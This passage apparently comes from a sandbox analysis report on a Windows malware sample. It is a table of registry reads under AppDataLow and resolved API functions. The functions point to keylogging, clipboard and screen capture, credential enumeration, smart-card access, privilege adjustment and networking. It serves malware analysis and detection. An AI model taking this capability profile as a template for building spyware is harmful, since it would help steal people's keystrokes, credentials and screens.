| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_5, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_6, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_7, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_8, type = REG_NONE |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlDecompressBuffer, address_out = 0x779d6b80 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74aa0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExA, address_out = 0x74abf500 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExA, address_out = 0x74abf790 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x74abf620 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x74abf520 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x74abf370 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExA, address_out = 0x74ac0a20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExA, address_out = 0x74abfa60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptExportKey, address_out = 0x74abfb30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x74ac0590 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptSetProvParam, address_out = 0x74ad6c90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x74ac0650 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74ac10a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x74abcbe0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenKey, address_out = 0x74ac3910 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x74ac0400 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGetUserKey, address_out = 0x74ad6c30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = IsValidSecurityDescriptor, address_out = 0x74ad7070 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = LookupPrivilegeValueW, address_out = 0x74abe430 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AdjustTokenPrivileges, address_out = 0x74ac0980 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = InitializeSecurityDescriptor, address_out = 0x74abfc00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorDacl, address_out = 0x74abf830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = InitializeAcl, address_out = 0x74abfa80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorSacl, address_out = 0x74ac2a20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x74abf330 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x74abfa20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryInfoKeyW, address_out = 0x74abf640 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegDeleteKeyW, address_out = 0x74ac04f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegDeleteValueW, address_out = 0x74ac0fb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenCurrentUser, address_out = 0x74ac1080 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumValueW, address_out = 0x74abf680 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x74abf350 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumKeyExW, address_out = 0x74abf470 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x74abf7f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGetHashParam, address_out = 0x74abf7d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CredFree, address_out = 0x74ac3930 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumKeyExA, address_out = 0x74ac1810 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextA, address_out = 0x74ac0630 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x74abfa00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumValueA, address_out = 0x74ac1e70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateA, address_out = 0x74ad6670 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x74ac02a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x74abfb10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = DeregisterEventSource, address_out = 0x74ab8570 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegisterEventSourceA, address_out = 0x74ac1570 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x74ac0440 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityInfo, address_out = 0x74ac05f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x74abf660 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSecurityInfo, address_out = 0x74abfbe0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetEntriesInAclA, address_out = 0x74ac3cc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameW, address_out = 0x74ac1030 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = ReportEventA, address_out = 0x74ad37a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\user32.dll, base_address = 0x77810000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x778262e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = LoadCursorW, address_out = 0x7782abd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = ToUnicodeEx, address_out = 0x77892420 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetWindowThreadProcessId, address_out = 0x7782da50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CallNextHookEx, address_out = 0x77823550 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetKeyState, address_out = 0x7782ddd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x77844f60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CloseClipboard, address_out = 0x778495c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = MapVirtualKeyA, address_out = 0x77843e20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DrawIcon, address_out = 0x7783f6e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetIconInfo, address_out = 0x77840160 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x779eaee0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = SetClipboardViewer, address_out = 0x77849a80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x77825d90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = UnhookWindowsHookEx, address_out = 0x77848fe0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = OpenClipboard, address_out = 0x77843920 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = SetWindowsHookExW, address_out = 0x7782fb10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x77829860 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetWindowTextW, address_out = 0x7783cb20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetClipboardData, address_out = 0x77842bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetProcessWindowStation, address_out = 0x77848b10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = MessageBoxA, address_out = 0x7788fec0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetUserObjectInformationW, address_out = 0x77848fa0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetMessageA, address_out = 0x7783e130 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = MapVirtualKeyW, address_out = 0x77843c80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageA, address_out = 0x77846f10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = IsCharAlphaNumericW, address_out = 0x7789ac00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x7782d9b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetCursorPos, address_out = 0x7783f6c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x778404a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CharLowerW, address_out = 0x7789ab20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetKeyboardState, address_out = 0x77849060 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetForegroundWindow, address_out = 0x77848cb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x77829580 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetKeyboardLayout, address_out = 0x7782ef20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetAsyncKeyState, address_out = 0x7782e820 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\psapi.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\psapi.dll, function = GetModuleFileNameExW, address_out = 0x772c13e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\psapi.dll, function = GetProcessMemoryInfo, address_out = 0x772c16c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\psapi.dll, function = GetModuleFileNameExA, address_out = 0x772c1660 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\psapi.dll, function = EnumProcessModules, address_out = 0x772c1360 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ws2_32.dll, base_address = 0x746c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 11, address_out = 0x746c5240 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = WSAEnumProtocolsW, address_out = 0x746d7ed0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 22, address_out = 0x746d4970 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = WSAIoctl, address_out = 0x746d2f70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 5, address_out = 0x746d48b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 2, address_out = 0x746d3230 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 4, address_out = 0x746d6090 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 8, address_out = 0x746c4ab0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 9, address_out = 0x746c4a90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 13, address_out = 0x746d5f50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 16, address_out = 0x746d1d20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 23, address_out = 0x746ce6b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 21, address_out = 0x746cecc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 112, address_out = 0x746c5a10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 7, address_out = 0x746d3e40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = WSASocketW, address_out = 0x746ce7d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = WSASendTo, address_out = 0x746d7f90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 6, address_out = 0x746d3830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = WSARecvFrom, address_out = 0x746d8090 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = WSARecv, address_out = 0x746d2c50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 10, address_out = 0x746ce180 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 18, address_out = 0x746d1f00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = GetNameInfoW, address_out = 0x746d4050 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = GetAddrInfoW, address_out = 0x746d2180 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = FreeAddrInfoW, address_out = 0x746d5ee0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = WSADuplicateSocketW, address_out = 0x746efca0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = WSASend, address_out = 0x746d2de0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 14, address_out = 0x746c4ab0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 151, address_out = 0x746c47e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 17, address_out = 0x746d7370 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 3, address_out = 0x746cead0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = WSCGetProviderPath, address_out = 0x746fde80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 15, address_out = 0x746c4a90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 57, address_out = 0x746f12a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 111, address_out = 0x746c4f60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 12, address_out = 0x746d59f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 115, address_out = 0x746c6520 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 19, address_out = 0x746d1b90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 52, address_out = 0x746f1110 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\gdi32.dll, base_address = 0x76f00000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = BitBlt, address_out = 0x76f82230 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x76f80fe0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = CreateDCW, address_out = 0x76fb2ab0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = DeleteObject, address_out = 0x76f80810 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = SelectObject, address_out = 0x76f80440 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleBitmap, address_out = 0x76f82390 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = DeleteDC, address_out = 0x76f80d00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = GetDIBits, address_out = 0x76f81580 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleDC, address_out = 0x76f82050 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlUnwind, address_out = 0x779c33a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = memmove, address_out = 0x779dcc90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = wcschr, address_out = 0x779de7a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = _stricmp, address_out = 0x779db580 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = strncmp, address_out = 0x779ddea0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = memchr, address_out = 0x779dc820 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = strncpy, address_out = 0x779ddf60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = strstr, address_out = 0x779de1a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = _aullrem, address_out = 0x779da880 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = strcspn, address_out = 0x779ddc80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = wcsstr, address_out = 0x779deaa0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = strchr, address_out = 0x779ddb20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = wcsrchr, address_out = 0x779dea00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlNtStatusToDosError, address_out = 0x779b83c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = strrchr, address_out = 0x779de110 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = VerSetConditionMask, address_out = 0x779c1a40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtUnmapViewOfSection, address_out = 0x779d6f40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = ZwClose, address_out = 0x779d6d70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtCreateSection, address_out = 0x779d7140 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtQueryVirtualMemory, address_out = 0x779d6ed0 |
|
1 | |
| Module | Get Handle | module_name = WinSCard.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = WinSCard.dll, base_address = 0x6fe20000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SCardEstablishContext, address_out = 0x6fe2c590 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SCardFreeMemory, address_out = 0x6fe2c9c0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SCardDisconnect, address_out = 0x6fe2c410 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SCardListReadersA, address_out = 0x6fe31ff0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SCardConnectA, address_out = 0x6fe30e30 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x779bd830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleExW, address_out = 0x765ba2b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x779bf730 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x765ba290 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x765b9bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x765e2430 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x765c6c20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x765c6f60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SystemTimeToTzSpecificLocalTime, address_out = 0x765c5c30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadConsoleInputA, address_out = 0x765c6fc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x765b8c20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x765ba790 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x765b8500 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x765c5140 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x765c6a10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileExW, address_out = 0x765c6940 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x765b7950 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x765c6730 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x765bb0b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x765e2670 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatW, address_out = 0x765bf7f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatW, address_out = 0x765bfd90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringW, address_out = 0x765c2630 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoW, address_out = 0x765bcd70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocale, address_out = 0x765bab40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLCID, address_out = 0x765c2920 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesW, address_out = 0x765bff10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableA, address_out = 0x765e22f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlushConsoleInputBuffer, address_out = 0x765c7080 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x765c68e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalMemoryStatus, address_out = 0x765b8e00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetWindowsDirectoryA, address_out = 0x765bb060 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DebugBreak, address_out = 0x765e0920 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadConsoleInputW, address_out = 0x765c6fd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCursorInfo, address_out = 0x765c70b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FillConsoleOutputAttribute, address_out = 0x765c7050 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleCursorInfo, address_out = 0x765c71a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleScreenBufferInfo, address_out = 0x765c70c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FillConsoleOutputCharacterW, address_out = 0x765c7070 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x765c7020 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleCursorPosition, address_out = 0x765c71b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleMode, address_out = 0x765c7000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadConsoleW, address_out = 0x765c6fe0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleTextAttribute, address_out = 0x765c71f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetNumberOfConsoleInputEvents, address_out = 0x765c6f90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77992bd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x765b1ba0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x765b75f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x765b7710 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x765b78b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x765c4bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x765b99f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x765c7b30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x765b9970 |
|
1 | |
